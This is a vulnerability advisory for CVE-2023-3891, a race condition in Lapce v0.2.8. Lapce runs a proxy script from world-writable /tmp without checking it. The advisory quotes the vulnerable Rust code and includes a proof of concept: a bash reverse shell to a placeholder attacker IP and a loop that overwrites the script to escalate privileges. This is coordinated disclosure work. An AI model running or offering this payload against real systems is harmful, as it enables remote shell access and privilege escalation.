---
slug: advisories/aerosmith/
title: Lapce v0.2.8 - Privilege escalation via Race Condition
authors: Renzo Machado
writer: rmachado
codename: aerosmith
product: Lapce v0.2.8 - Privilege escalation via Race Condition
date: 2023-08-8 12:00 COT
cveid: CVE-2023-3891
severity: 7.3
description: Lapce v0.2.8 - Privilege escalation via Race Condition
keywords: Fluid Attacks, Security, Vulnerabilities, Privilege Escalation, Lapce, CVE
banner: advisories-bg
template: advisory
advise: yes
---

## Summary

<summary-table
    name="Lapce v0.2.8 - Privilege escalation via Race Condition"
    code="[Aerosmith](https://en.wikipedia.org/wiki/Aerosmith)"
    product="Lapce"
    affected-versions="Version 0.2.8"
    state="Public"
    release="2023-06-01">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Race Condition"
    rule="[124. Race Condition](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-124)"
    remote="No"
    vector="CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
    score="7.3"
    available="Yes"
    id="[CVE-2023-3891](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3891)">
</vulnerability-table>

## Description

Lapce v0.2.8 contains a logical vulnerability in its code that could potentially
allow an attacker to escalate their privileges on the server. This vulnerability
arises when downloading a file remotely to a location where an attacker can
manipulate the downloaded file. The issue is attributed to a Race Condition
vulnerability in the code.

## Vulnerability

An identified vulnerability in Lapce v0.2.8 involves Privilege Escalation via a
Race Condition. This vulnerability is the result of multiple bad practices,
making it possible for a user with local network access to compromise the system
 and escalate their privileges. The file at the center of this vulnerability is:
`remote.rs`

```rust
 _ => {
            let local_proxy_script =
                Directory::proxy_directory().unwrap().join("proxy.sh"); // The file is obtained

            let mut proxy_script = std::fs::OpenOptions::new()
                .create(true)
                .write(true)
                .open(&local_proxy_script)?;
            proxy_script.write_all(UNIX_PROXY_SCRIPT)?;

            let remote_proxy_script = "/tmp/lapce-proxy.sh";
            remote.upload_file(local_proxy_script, remote_proxy_script)?; // Here, the file is uploaded to the SSH server. From this point, the attacker needs to overwrite the proxy.sh script.

            let cmd = remote // At this point, the proxy.sh script needs to be overwritten to achieve Privilege Escalation
                .command_builder()
                .args(["chmod", "+x", remote_proxy_script]) // The script is granted execute permissions.
                .output()?;
            debug!("{}", String::from_utf8_lossy(&cmd.stderr));
            debug!("{}", String::from_utf8_lossy(&cmd.stdout));

            let cmd = remote
                .command_builder()
                .args([
                    remote_proxy_script,
                    if meta::VERSION == "debug" {
                        "nightly"
                    } else {
                        meta::VERSION
                    },
                    remote_proxy_path,
                ])
                .output()?; // The script is executed.
            debug!("{}", String::from_utf8_lossy(&cmd.stderr));
            debug!("{}", String::from_utf8_lossy(&cmd.stdout));

            cmd.status
        }
```

At the time of execution, there is no validation of the script's integrity, and
its location in a folder with write permissions for anyone makes it susceptible
to potential overwrites, primarily due to a race condition.

## Exploitation

To exploit this vulnerability, you must first have compromised the server,
either remotely or locally, let's call this "User 1". Then, another user, either
local or remote, with higher privileges, such as the "root" user, attempts to
connect to the server using Lapce. At this point, the script that User 1 is
overwriting will be executed by the "root" user when attempting to connect to
the server.
In summary, you need initial access to the server as User 1 and then wait for
User 2, who has higher privileges, to try to connect using Lapce for the script
to be executed with those privileges.
You must go to the tmp directory and execute the following commands:

```bash
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1" > /tmp/test.sh
while true; do cp /tmp/test.sh /tmp/lapce-proxy.sh || chmod 755 /tmp/lapce-proxy.sh ;done &>/dev/null
```

## Evidence of exploitation

It's important to note that this vulnerability arises due to the downloading of
a file to a directory where any user can write files. If the file is created at
the same time it's being downloaded, it can be overwritten, allowing an attacker
to manipulate the script's original operation and potentially achieve privilege
escalation on the system.
To exploit this vulnerability, simply utilize the provided Proof of Concept
(PoC) code in the console and wait for a user to attempt to log into a remote
server using the SSH service implemented by Lapce. This attack scenario only
occurs if the script is created before Lapce generates it; if it's already
generated, you would need to wait until the temporary content is deleted.
For a more detailed demonstration of the exploitation process, please refer to
the following video."

<iframe src="https://www.veed.io/embed/ff90f36f-c468-43f3-a2c1-e961fb084a79"
width="744" height="504" frameborder="0" title="exploit"
webkitallowfullscreen="true" mozallowfullscreen allowfullscreen></iframe>

The significant impact of this vulnerability is the potential for a user to
escalate privileges by executing commands as that user. The following video
demonstrates how this can be achieved:

<iframe src="https://www.veed.io/embed/afd3a26a-b2d9-4dd9-9319-1c9fb627e436"
width="744" height="504" frameborder="0" title="Privilege escalation"
webkitallowfullscreen="true" mozallowfullscreen allowfullscreen></iframe>

## Our security policy

We have reserved the ID CVE-2023-3891 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Lapce v0.2.8 (2023-06-01)

* Operating System: MacOS

## Mitigation

There is a patched code of Lapce is available at Github.

## Credits

The vulnerability was discovered by
[Renzo Machado](https://www.linkedin.com/in/renzo-neomar-machado-50881a235/)
from Fluid Attacks'Offensive Team.

## References

**Vendor page** <https://lapce.dev/>

## Timeline

<time-lapse
discovered="2023-08-08"
contacted="2023-08-09"
replied="2023-08-09"
confirmed="2023-08-09"
patched="2023-08-19"
disclosure="2023-09-18">
</time-lapse>
